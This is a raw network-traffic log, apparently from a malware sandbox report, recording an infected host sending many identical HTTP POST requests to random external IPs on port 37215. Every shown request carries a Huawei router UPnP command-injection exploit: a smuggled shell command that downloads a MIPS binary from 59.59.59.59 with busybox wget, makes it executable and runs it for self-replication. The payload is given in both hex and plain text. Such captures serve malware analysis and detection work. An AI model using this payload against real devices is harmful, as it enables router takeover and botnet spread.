                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          841192.168.2.1560236197.148.201.437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.648735046 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          842192.168.2.1542158157.163.15.19837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.649081945 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          843192.168.2.1549498197.152.135.8637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.649199009 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          844192.168.2.154916641.126.62.12937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.650192022 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          845192.168.2.1545846115.99.252.23937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.654663086 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          846192.168.2.1560876157.74.32.16337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.655462027 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          847192.168.2.153664873.253.135.19737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.655666113 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          848192.168.2.1555696157.79.102.437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.655689955 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          849192.168.2.156054632.170.222.3737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.655767918 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          850192.168.2.1558616157.185.217.8437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.655802011 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 